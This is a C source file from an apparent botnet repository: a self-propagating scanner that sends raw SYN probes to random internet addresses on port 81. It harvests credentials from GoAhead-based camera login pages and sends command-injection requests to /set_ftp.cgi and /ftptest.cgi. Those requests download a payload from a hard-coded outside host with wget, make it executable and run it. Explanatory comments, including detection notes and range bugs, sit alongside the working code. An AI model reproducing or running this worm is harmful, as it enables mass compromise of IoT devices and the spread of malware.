GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Self Reps/GOAHEAD/goahead.c
#define _GNU_SOURCE
#ifdef DEBUG
#include <stdio.h>
#endif
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/select.h>
#include <sys/types.h>
#include <time.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include "includes.h"
#include "goahead.h"
#include "table.h"
#include "rand.h"
#include "util.h"
#include "checksum.h"
/*
 * Scanner worker state, shared between scanner_init(), scanner_kill() and
 * setup_connection() below.  None of it is protected by a lock: the worker
 * is a separate forked process and owns these copies after the fork.
 */
// scanner_pid: child PID recorded by scanner_init() (0 until it forks).
// rsck: the raw IPPROTO_TCP socket the worker both sends probes on and
// reads replies from.  rsck_out and auth_table_len are not referenced by
// any code in this listing.
int scanner_pid = 0, rsck = 0, rsck_out = 0, auth_table_len = 0;
// One pre-built IPv4 + TCP header pair.  scanner_init() fills the constant
// fields once and rewrites only id/saddr/daddr/seq and both checksums per probe.
char scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};
// Not referenced by any code in this listing (left over from the generic scanner).
struct scanner_auth *auth_table = NULL;
// SCANNER_MAX_CONNS slots, calloc'd in scanner_init(); each tracks one target.
struct scanner_connection *conn_table;
// Not referenced by any code in this listing.
uint16_t auth_table_max_weight = 0;
// Coarse clock: time(NULL) sampled once per select() round, used for
// the per-slot 5 s inactivity timeout and the once-per-second probe burst.
uint32_t fake_time = 0;
/*
 * recv() wrapper that rewrites every 0x00 byte of the received data to 'A'.
 *
 * The caller (the rdbuf reader in scanner_init()) runs util_strlen(),
 * strtok() and strstr() over the buffer afterwards, so embedded NULs would
 * otherwise truncate the text it is trying to parse.
 *
 * @param sock   connected socket
 * @param buf    destination buffer, at least len bytes
 * @param len    maximum bytes to read
 * @param flags  passed straight through to recv()
 * @return       recv()'s own return value: bytes read, 0 on orderly
 *               shutdown, -1 with errno set on error.  Only the bytes
 *               actually received are touched.
 */
int recv_strip_null(int sock, void *buf, int len, int flags)
{
    int ret = recv(sock, buf, len, flags);

    if(ret > 0)
    {
        int i = 0;

        for(i = 0; i < ret; i++)
        {
            if(((char *)buf)[i] == 0x00)
            {
                ((char *)buf)[i] = 'A';
            }
        }
    }

    return ret;
}
/*
 * Fork the scanner worker.  The parent (and the caller on a failed fork)
 * returns immediately; the child never returns and loops until killed.
 *
 * What the child does, as written in this function:
 *   1. Builds one raw IPv4/TCP SYN in scanner_rawpkt with a random source
 *      port >= 1024 and destination port 81.
 *   2. Every time fake_time ticks (about once per second, see the 1 s
 *      select() timeout) sends SCANNER_RAW_PPS copies of it to addresses from
 *      get_random_ip().  The TCP sequence number is set to the destination
 *      address, so a reply can be matched without keeping per-target state.
 *   3. Drains SYN+ACK replies from the same raw socket, keeps only those whose
 *      ack_seq - 1 equals the replying address, and gives each hit a free
 *      conn_table slot via setup_connection().
 *   4. Walks each slot through SC_CONNECTING -> SC_GET_CREDENTIALS
 *      (sends "GET login.cgi", splits the reply on spaces and keeps tokens
 *      containing "login") -> SC_EXPLOIT_STAGE2 (/set_ftp.cgi request built
 *      from the harvested values) -> SC_EXPLOIT_STAGE3 (/ftptest.cgi), with a
 *      fresh TCP connection for each stage.
 *
 * Detection-relevant constants visible below: TCP/81 SYN probes whose
 * sequence number equals the destination IP, the request paths login.cgi,
 * /set_ftp.cgi and /ftptest.cgi, the staging paths /tmp/t and /tmp/a, and the
 * hard-coded download host 167.99.88.89 inside the stage-2 request string.
 * A slot with no data for more than 5 s is closed.
 *
 * Returns nothing.  Setup failures (raw socket, IP_HDRINCL) exit(0) the child.
 * Side effects: sets scanner_pid, LOCAL_ADDR, rsck, fake_time and conn_table.
 * No return value of fork/calloc/fcntl/sendto/send/select is checked.
 */
void scanner_init(void)
{
    int i = 0;
    uint16_t source_port;
    struct iphdr *iph;
    struct tcphdr *tcph;

    // Let parent continue on main thread
    scanner_pid = fork();
    if(scanner_pid > 0 || scanner_pid == -1)
        return;

    LOCAL_ADDR = util_local_addr();

    rand_init();
    fake_time = time(NULL);
    conn_table = calloc(SCANNER_MAX_CONNS, sizeof(struct scanner_connection));
    for(i = 0; i < SCANNER_MAX_CONNS; i++)
    {
        conn_table[i].state = SC_CLOSED;
        conn_table[i].fd = -1;
        conn_table[i].credential_index = 0;
    }

    // Set up raw socket scanning and payload
    // IP_HDRINCL means the IP header in scanner_rawpkt is sent as-is, which
    // is what lets the worker choose its own source address and TCP seq.
    if((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
    {
#ifdef DEBUG
        printf("[scanner] failed to initialize raw socket, cannot scan\n");
#endif
        exit(0);
    }
    fcntl(rsck, F_SETFL, O_NONBLOCK | fcntl(rsck, F_GETFL, 0));
    i = 1;
    if(setsockopt(rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)
    {
#ifdef DEBUG
        printf("[scanner] failed to set IP_HDRINCL, cannot scan\n");
#endif
        close(rsck);
        exit(0);
    }

    // Random, network-order source port; rejected until its host-order
    // value is >= 1024.  Replies are later filtered on this exact port.
    do
    {
        source_port = rand_next() & 0xffff;
    }
    while(ntohs(source_port) < 1024);

    iph = (struct iphdr *)scanner_rawpkt;
    tcph = (struct tcphdr *)(iph + 1);

    // Set up IPv4 header
    iph->ihl = 5;
    iph->version = 4;
    iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));
    iph->id = rand_next();
    iph->ttl = 64;
    iph->protocol = IPPROTO_TCP;

    // Set up TCP header
    tcph->dest = htons(81);
    tcph->source = source_port;
    tcph->doff = 5;
    tcph->window = rand_next() & 0xffff;
    tcph->syn = TRUE;

#ifdef DEBUG
    printf("[scanner] scanner process initialized. scanning started.\n");
#endif

    // Main logic loop
    while(TRUE)
    {
        fd_set fdset_rd, fdset_wr;
        struct scanner_connection *conn;
        struct timeval tim;
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;

        // Spew out SYN to try and get a response
        if(fake_time != last_spew)
        {
            last_spew = fake_time;

            for(i = 0; i < SCANNER_RAW_PPS; i++)
            {
                struct sockaddr_in paddr = {0};
                struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

                iph->id = rand_next();
                iph->saddr = LOCAL_ADDR;
                iph->daddr = get_random_ip();
                iph->check = 0;
                iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));

                tcph->dest = htons(81);
                // seq == daddr: the SYN+ACK's ack number (seq+1) then encodes
                // which address was probed, so no probe list has to be kept.
                tcph->seq = iph->daddr;
                tcph->check = 0;
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));

                paddr.sin_family = AF_INET;
                paddr.sin_addr.s_addr = iph->daddr;
                paddr.sin_port = tcph->dest;

                sendto(rsck, scanner_rawpkt, sizeof(scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));
            }
        }

        // Read packets from raw socket to get SYN+ACKs
        // The socket is non-blocking, so this drains whatever is queued and
        // stops on EAGAIN/EWOULDBLOCK or when no SC_CLOSED slot is left.
        last_avail_conn = 0;
        while(TRUE)
        {
            int n = 0;
            char dgram[1514];
            struct iphdr *iph = (struct iphdr *)dgram;
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
            struct scanner_connection *conn;

            errno = 0;
            n = recvfrom(rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);
            if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
                break;

            // Accept only a SYN+ACK (no RST/FIN) from port 81 to our probe
            // port, addressed to us, whose ack number - 1 is the sender's own
            // address (the seq the probe carried).
            if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))
                continue;
            if(iph->daddr != LOCAL_ADDR)
                continue;
            if(iph->protocol != IPPROTO_TCP)
                continue;
            if(tcph->source != htons(81))
                continue;
            if(tcph->dest != source_port)
                continue;
            if(!tcph->syn)
                continue;
            if(!tcph->ack)
                continue;
            if(tcph->rst)
                continue;
            if(tcph->fin)
                continue;
            if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
                continue;

            conn = NULL;
            for(n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
            {
                if(conn_table[n].state == SC_CLOSED)
                {
                    conn = &conn_table[n];
                    last_avail_conn = n;
                    break;
                }
            }

            // If there were no slots, then no point reading any more
            if(conn == NULL)
                break;

            conn->dst_addr = iph->saddr;
            conn->dst_port = tcph->source;
            setup_connection(conn);
        }

        FD_ZERO(&fdset_rd);
        FD_ZERO(&fdset_wr);

        // Expire idle slots, then sort live ones into the select() sets:
        // states waiting on connect() completion go in fdset_wr, the rest
        // (SC_GET_CREDENTIALS) in fdset_rd.
        for(i = 0; i < SCANNER_MAX_CONNS; i++)
        {
            int timeout = 5;

            conn = &conn_table[i];
            //timeout = (conn->state > SC_CONNECTING ? 30 : 5);

            if(conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
            {
#ifdef DEBUG
                printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
#endif

                close(conn->fd);
                conn->fd = -1;
                conn->state = SC_CLOSED;
                free(conn->credentials);
                conn->credential_index = 0;
                util_zero(conn->rdbuf, sizeof(conn->rdbuf));

                continue;
            }

            if(conn->state == SC_CONNECTING || conn->state == SC_EXPLOIT_STAGE2 || conn->state == SC_EXPLOIT_STAGE3)
            {
                FD_SET(conn->fd, &fdset_wr);
                if(conn->fd > mfd_wr)
                    mfd_wr = conn->fd;
            }
            else if(conn->state != SC_CLOSED)
            {
                FD_SET(conn->fd, &fdset_rd);
                if(conn->fd > mfd_rd)
                    mfd_rd = conn->fd;
            }
        }

        tim.tv_usec = 0;
        tim.tv_sec = 1;
        nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
        fake_time = time(NULL);

        for(i = 0; i < SCANNER_MAX_CONNS; i++)
        {
            conn = &conn_table[i];

            if(conn->fd == -1)
                continue;

            // Writable means the non-blocking connect() finished; SO_ERROR
            // tells whether it succeeded.
            if(FD_ISSET(conn->fd, &fdset_wr))
            {
                int err = 0, ret = 0;
                socklen_t err_len = sizeof(err);

                ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
                if(err == 0 && ret == 0)
                {
#ifdef DEBUG
                    printf("[scanner] FD%d connected to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);
#endif

                    if(conn->state == SC_EXPLOIT_STAGE2)
                    {
#ifdef DEBUG
                        printf("[scanner] FD%d login extraction successful, continuing with stage 2 of execution\n", conn->fd);
#endif

                        // this example is for goahead
                        // Stage 2: /set_ftp.cgi requests carrying credentials[0]/[1]
                        // as loginuse/loginpas; the svr= parameter values are the
                        // strings most worth matching in HTTP telemetry.
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
                        util_strcat(conn->payload_buf, conn->credentials[0]);
                        util_strcat(conn->payload_buf, "&loginpas=");
                        util_strcat(conn->payload_buf, conn->credentials[1]);
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e+""cd+/tmp""+>>+/tmp/t%29 HTTP/1.0\r\n\r\n");
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
                        util_strcat(conn->payload_buf, conn->credentials[0]);
                        util_strcat(conn->payload_buf, "&loginpas=");
                        util_strcat(conn->payload_buf, conn->credentials[1]);
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e+""wget+http:/\/167.99.88.89/a""+>>+/tmp/t%29 HTTP/1.0\r\n\r\n");
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
                        util_strcat(conn->payload_buf, conn->credentials[0]);
                        util_strcat(conn->payload_buf, "&loginpas=");
                        util_strcat(conn->payload_buf, conn->credentials[1]);
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e+""chmod+777+/tmp/a""+>>+/tmp/t%29 HTTP/1.0\r\n\r\n");
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
                        util_strcat(conn->payload_buf, conn->credentials[0]);
                        util_strcat(conn->payload_buf, "&loginpas=");
                        util_strcat(conn->payload_buf, conn->credentials[1]);
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e""/tmp/a""+>>+/tmp/t%29 HTTP/1.0\r\n\r\n");
                        util_strcpy(conn->payload_buf, "GET /set_ftp.cgi?loginuse=");
                        util_strcat(conn->payload_buf, conn->credentials[0]);
                        util_strcat(conn->payload_buf, "&loginpas=");
                        util_strcat(conn->payload_buf, conn->credentials[1]);
                        util_strcat(conn->payload_buf, "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28rm+-rf+/tmp/*%29 HTTP/1.0\r\n\r\n");

                        // actually send the payload
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);

                        // clear the payload buffer
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));

                        // clear the socket buffer
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));

                        // New TCP connection for stage 3; setup_connection()
                        // keeps the state untouched, it is set explicitly here.
                        close(conn->fd);
                        setup_connection(conn);
                        conn->credential_index = 0;
                        conn->state = SC_EXPLOIT_STAGE3;

                        continue;
                    }
                    else if(conn->state == SC_EXPLOIT_STAGE3)
                    {
#ifdef DEBUG
                        printf("[scanner] FD%d sending final command to complete the exploit (stage 3)\n", conn->fd);
#endif

                        // build stage 3 payload
                        util_strcpy(conn->payload_buf2, "GET /ftptest.cgi?loginuse=");
                        util_strcat(conn->payload_buf2, conn->credentials[0]);
                        util_strcat(conn->payload_buf2, "&loginpas=");
                        util_strcat(conn->payload_buf2, conn->credentials[1]);
                        util_strcat(conn->payload_buf2, " HTTP/1.0\r\n\r\n");

                        // actually send the payload
                        send(conn->fd, conn->payload_buf2, util_strlen(conn->payload_buf2), MSG_NOSIGNAL);

                        // clear the payload buffer
                        util_zero(conn->payload_buf2, sizeof(conn->payload_buf2));

                        // clear the socket buffer
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));

                        // reset stuff
                        free(conn->credentials);
                        conn->credential_index = 0;

                        close(conn->fd);
                        conn->fd = -1;
                        conn->state = SC_CLOSED;

                        continue;
                    }
                    else
                    {
#ifdef DEBUG
                        printf("[scanner] FD%d preparing to retrieve credentials (stage %d)\n", conn->fd, conn->state);
#endif

                        // First contact (SC_CONNECTING): request the login page.
                        // credentials is indexed like char ** below; 256 bytes,
                        // contents left uninitialised by malloc().
                        conn->credentials = malloc(256);
                        send(conn->fd, "GET login.cgi HTTP/1.0\r\n\r\n", 26, MSG_NOSIGNAL);
                        conn->state = SC_GET_CREDENTIALS;
                    }
                }
                else
                {
#ifdef DEBUG
                    printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
#endif

                    close(conn->fd);
                    conn->fd = -1;
                    conn->state = SC_CLOSED;

                    continue;
                }
            }

            // Readable: pull the HTTP reply into rdbuf and, in
            // SC_GET_CREDENTIALS, pick user/pass tokens out of it.
            if(FD_ISSET(conn->fd, &fdset_rd))
            {
                while(TRUE)
                {
                    int ret = 0;

                    if(conn->state == SC_CLOSED)
                        break;

                    // Buffer full: drop the oldest SCANNER_HACK_DRAIN bytes.
                    if(conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
                    {
                        memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
                        conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
                    }

                    errno = 0;
                    ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
                    // Peer closed: treat exactly like a hard error below.
                    if(ret == 0)
                    {
#ifdef DEBUG
                        printf("[scanner] FD%d connection gracefully closed (stage %d)\n", conn->fd, conn->state);
#endif
                        errno = ECONNRESET;
                        ret = -1;
                    }
                    if(ret == -1)
                    {
                        if(errno != EAGAIN && errno != EWOULDBLOCK)
                        {
                            if(conn->state == SC_EXPLOIT_STAGE2)
                            {
#ifdef DEBUG
                                printf("[scanner] FD%d resetting connection preparing to continue with stage 2 of the exploit\n", conn->fd);
#endif
                                close(conn->fd);
                                setup_connection(conn);
                                continue;
                            }

                            close(conn->fd);
                            conn->fd = -1;
                            conn->state = SC_CLOSED;
                            free(conn->credentials);
                            conn->credential_index = 0;
                            util_zero(conn->rdbuf, sizeof(conn->rdbuf));
                        }
                        break;
                    }

                    conn->rdbuf_pos += ret;
                    conn->last_recv = fake_time;

                    int len = util_strlen(conn->rdbuf);
                    conn->rdbuf[len] = 0;

                    if(conn->state == SC_GET_CREDENTIALS)
                    {
                        // Tokenise on spaces; every token containing "login" is
                        // trimmed of its first 11 characters, cut at the first
                        // ';', '"' or ' ', and stored at credentials[credential_index].
                        char *out = strtok(conn->rdbuf, " ");

                        while(out != NULL)
                        {
                            if(strstr(out, "login"))
                            {
#ifdef DEBUG
                                printf("[scanner] FD%d parsing credentials...\n", conn->fd);
#endif

                                memmove(out, out + 11, strlen(out));

                                int i = 0;

                                for(i = 0; i < strlen(out); i++)
                                {
                                    if(out[i] == ';' || out[i] == '"' || out[i] == ' ')
                                        out[i] = 0;
                                }

                                conn->credentials[conn->credential_index] = strdup(out);
                                conn->credential_index++;

                            }

                            out = strtok(NULL, " ");
                        }
                    }

                    // Runs after every successful recv, whatever the state.
                    if(conn->credentials[0] == NULL && conn->credentials[1] == NULL)
                    {
#ifdef DEBUG
                        printf("[scanner] FD%d failed to retrieve credentials\n", conn->fd);
#endif
                        close(conn->fd);
                        conn->fd = -1;
                        conn->state = SC_CLOSED;
                        free(conn->credentials);
                        conn->credential_index = 0;
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
                    }
                    else
                    {
#ifdef DEBUG
                        printf("[scanner] FD%d retrieved user: %s, pass: %s changing exploit stages\n", conn->fd, conn->credentials[0], conn->credentials[1]);
#endif

                        // Socket is closed and fd set to -1 here; the slot stays in
                        // SC_EXPLOIT_STAGE2 and no reconnect is started at this point.
                        close(conn->fd);
                        conn->fd = -1;
                        conn->state = SC_EXPLOIT_STAGE2;
                        conn->credential_index = 0;
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));
                    }
                }
            }
        }
    }
}
/*
 * Stop the scanner worker: send SIGKILL (9) to the PID scanner_init()
 * recorded.  The child is not waited for and scanner_pid is not reset.
 */
void scanner_kill(void)
{
    kill(scanner_pid, 9);
}
/*
 * Start a non-blocking TCP connect() to conn->dst_addr:conn->dst_port.
 *
 * Any socket already held in conn->fd is closed first, rdbuf is cleared and
 * last_recv is stamped with fake_time.  The slot's state is left alone when
 * it is SC_EXPLOIT_STAGE2 or SC_EXPLOIT_STAGE3 (a reconnect between exploit
 * stages); otherwise it becomes SC_CONNECTING.  The connect() result is not
 * checked here: completion is observed by scanner_init() when the fd turns
 * writable and SO_ERROR is read.  On socket() failure conn->fd is -1 and the
 * function returns without touching the rest of the slot.
 *
 * Declared static but called from scanner_init() above its definition, so a
 * prototype is presumably provided by goahead.h.
 *
 * @param conn  slot with dst_addr/dst_port already filled in (network order)
 */
static void setup_connection(struct scanner_connection *conn)
{
    struct sockaddr_in addr = {0};

    if(conn->fd != -1)
        close(conn->fd);

    if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
#ifdef DEBUG
        printf("[scanner] failed to call socket()\n");
#endif
        return;
    }

    conn->rdbuf_pos = 0;
    util_zero(conn->rdbuf, sizeof(conn->rdbuf));

    fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = conn->dst_addr;
    addr.sin_port = conn->dst_port;

    conn->last_recv = fake_time;

    // Keep the stage when reconnecting for stage 2/3; anything else is a
    // fresh first contact.
    if(conn->state == SC_EXPLOIT_STAGE2 || conn->state == SC_EXPLOIT_STAGE3)
    {
    }
    else
    {
        conn->state = SC_CONNECTING;
    }

    connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
}
/*
 * Pick a random IPv4 address to probe.
 *
 * Draws 32 bits from rand_next(), splits them into octets o1..o4 and redraws
 * while the first one or two octets fall into the excluded ranges listed in
 * the loop condition.  The result is assembled with INET_ADDR(o1,o2,o3,o4).
 *
 * Two of the inline range comments do not match the code they annotate:
 * (o1 == 172 && o2 >= 16 && o2 < 32) covers 172.16.0.0/12, not /14, and
 * (o1 == 169 && o2 > 254) only ever matches o2 == 255 (o2 is a uint8_t), so
 * 169.254.0.0/16 is not actually excluded by this test.
 *
 * @return  address in the form INET_ADDR() produces (byte order per that macro)
 */
static ipv4_t get_random_ip(void)
{
    uint32_t tmp;
    uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;

    do
    {
        tmp = rand_next();

        o1 = tmp & 0xff;
        o2 = (tmp >> 8) & 0xff;
        o3 = (tmp >> 16) & 0xff;
        o4 = (tmp >> 24) & 0xff;
    }
    while(o1 == 127 ||                             // 127.0.0.0/8 - Loopback
          (o1 == 0) ||                             // 0.0.0.0/8 - Invalid address space
          (o1 == 3) ||                             // 3.0.0.0/8 - General Electric Company
          (o1 == 15 || o1 == 16) ||                // 15.0.0.0/7 - Hewlett-Packard Company
          (o1 == 56) ||                            // 56.0.0.0/8 - US Postal Service
          (o1 == 10) ||                            // 10.0.0.0/8 - Internal network
          (o1 == 192 && o2 == 168) ||              // 192.168.0.0/16 - Internal network
          (o1 == 172 && o2 >= 16 && o2 < 32) ||    // 172.16.0.0/12 - Internal network (comment said /14; code is /12)
          (o1 == 100 && o2 >= 64 && o2 < 127) ||   // 100.64.0.0/10 - IANA NAT reserved
          (o1 == 169 && o2 > 254) ||               // intended 169.254.0.0/16, but o2 > 254 only matches 169.255.x.x
          (o1 == 198 && o2 >= 18 && o2 < 20) ||    // 198.18.0.0/15 - IANA Special use
          (o1 >= 224) ||                           // 224.*.*.*+ - Multicast
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
    );

    return INET_ADDR(o1,o2,o3,o4);
}